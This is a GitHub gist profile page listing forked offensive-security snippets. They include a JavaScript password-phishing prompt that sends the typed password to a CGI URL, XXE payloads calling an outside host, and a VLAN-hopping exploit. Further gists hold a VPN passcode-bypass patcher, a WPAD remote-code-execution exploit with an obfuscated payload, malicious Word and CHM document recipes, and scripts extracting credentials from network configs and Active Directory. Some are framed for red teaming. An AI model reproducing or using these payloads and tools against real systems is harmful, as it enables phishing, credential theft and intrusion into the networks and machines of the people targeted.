Skip to content

Instantly share code, notes, and snippets.

View Dlat's full-sized avatar

David Dlat

24 followers · 62 following
View GitHub Profile
@Dlat
Dlat / gist:d11ea9866d45a926c146
Created July 9, 2015 23:59
test
<html>
<SCRIPT Language="Javascript">var password=prompt
('Your session has expired. Please enter your password to
continue.',");
location.href="http://127.0.0.1/pass.cgi?passwd="+password;</SCRIPT>
</html>
@Dlat
Dlat / XXE_payloads
Created August 20, 2018 19:24 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@Dlat
Dlat / VLANHopperDTP.py
Created August 20, 2018 19:24 — forked from mgeeky/VLANHopperDTP.py
VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request.
#!/usr/bin/python
#
# This script is performing DTP Trunk mode detection and VLAN Hopping
# attack automatically, running sniffer afterwards to collect any other
# VLAN available. To be launched only in Unix/Linux environment as the
# script utilizes following applications:
# - 8021q.ko
# - vconfig
# - ifconfig / ip / route
@Dlat
Dlat / GlobalProtectDisable.cpp
Created August 20, 2018 19:25 — forked from mgeeky/GlobalProtectDisable.cpp
Global Protect VPN Application patcher allowing the Administrator user to disable VPN without Passcode.
/*
* Global Protect VPN Application patcher allowing the
* Administrator user to disable VPN without Passcode.
*
* It does this by patching process memory and thus allowing to
* disable VPN without entering proper password.
*
* Tested on:
* GlobalProtect client 3.1.6.19
* Palo Alto Networks
@Dlat
Dlat / muti-stage-1.md
Created August 20, 2018 19:33 — forked from mgeeky/muti-stage-1.md
Multi-Stage Malicious Document creation process (ala APT)

Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process

The below paper documents the process of creating a multi-stage IPS/AV transparent malicious document for purposes of Red Teaming / Penetration-Testing assignments.

The resulted document will be:

  • using OLE event autorun method
  • removing it's pretext shapes
  • Obtaining commands to be executed from document's Author property and passing them to StdIn of Powershell.exe process
  • Leveraging certutil technique to receive Base64 encoded malicious HTA document
  • Having Base64 encoded Powershell command in that Author property
@Dlat
Dlat / wpad.dat
Created August 20, 2018 19:34 — forked from mgeeky/wpad.dat
WPAD/PAC RCE Exploit working on Windows 10 x64 as documented by Google Project Zero (Source: https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html)
function FindProxyForURL(url, host) {
var payload = String.fromCharCode(0x6f50,0x6577,0x5372,0x6568,0x6c6c,0x2d20,0x6f43,0x6d6d,0x6e61,0x2064,0x6522,0x6863,0x206f,0x5654,0x5171,0x4141,0x414d,0x4141,0x4541,0x4141,0x4141,0x2f2f,0x4138,0x4c41,0x4167,0x4141,0x4141,0x4141,0x4141,0x4151,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4141,0x4136,0x4141,0x4141,0x6634,0x6775,0x4134,0x4174,0x4e6e,0x6249,0x4267,0x4d54,0x6830,0x4756,0x7068,0x7963,0x7742,0x6d63,0x6e39,0x6d63,0x7446,0x4749,0x684e,0x6d62,0x7635,0x4364,0x6942,0x535a,0x7942,0x5764,0x6734,0x5761,0x6734,0x4552,0x5439,0x4749,0x7631,0x475a,0x7555,0x5144,0x4b30,0x414a,0x4141,0x4141,0x4141,0x4141,0x5a43,0x4371,0x4b48,0x6333,0x506c,0x646d,0x4a33,0x3554,0x646e,0x5579,0x5a2b,0x7172,0x4a74,0x4e6d,0x4a2f,0x3554,0x756d,0x3071,0x5936,0x4d31,0x506c,0x646d,0x4a33,0x7054,0x446e,0x5579,0x5a2b,0x7146,0x4c70,0x4e6d,0x4a7a,0x3554,0x576b,0x6b71,0x5971,0x3833,0x506c,0x526d
@Dlat
Dlat / networkConfigurationCredentialsExtract.py
Created August 20, 2018 19:34 — forked from mgeeky/networkConfigurationCredentialsExtract.py
Network-configuration Credentials extraction script - intended to sweep input configuration file and extract keys, hashes, passwords.
#!/usr/bin/python
#
# Script intendend to sweep Cisco, Huawei and possibly other network devices
# configuration files in order to extract plain and cipher passwords out of them.
#
# Mariusz B., mgeeky '18
#
import re
@Dlat
Dlat / Get-UserPasswordEntries.ps1
Created August 20, 2018 19:47 — forked from mgeeky/Get-UserPasswordEntries.ps1
Get-UserPasswordEntries - Red-Teaming script intended to look through Active Directory's LDAP/GlobalCatalog and extract every user having set userPassword property. Then to decode that property.
# Assuming we have PowerView's Get-NetUser command available.
Import-Module powerview.ps1 -ErrorAction SilentlyContinue
Function Get-UserPasswordEntries
{
$passwordsEntries = Get-NetUser -Filter userpassword=*
$num = 0
foreach ($entry in $passwordsEntries) {
$passw = $entry | Select -ExpandProperty userpassword
@Dlat
Dlat / sqlmap-tamper-scripts-evaluation.md
Created August 20, 2018 19:47 — forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF

The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY

Below names are to be passed to the --tamper= parameter of sqlmap.

The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.

The scale is 0-5.

@Dlat
Dlat / Malicious-CHM-Guide.md
Created August 20, 2018 19:48 — forked from mgeeky/Malicious-CHM-Guide.md
CheatSheet describing how to create malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).

Procedure for generating Malicious CHM file

  • Step 0: Download and install Microsoft HTML Help Workshop and Documentation
  • Step 1: Obtain a valid CHM file and unpack it using 7-zip
  • Step 2: Find an entry-point HTML file within "docs" directory and insert the following code into it's <body> section:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>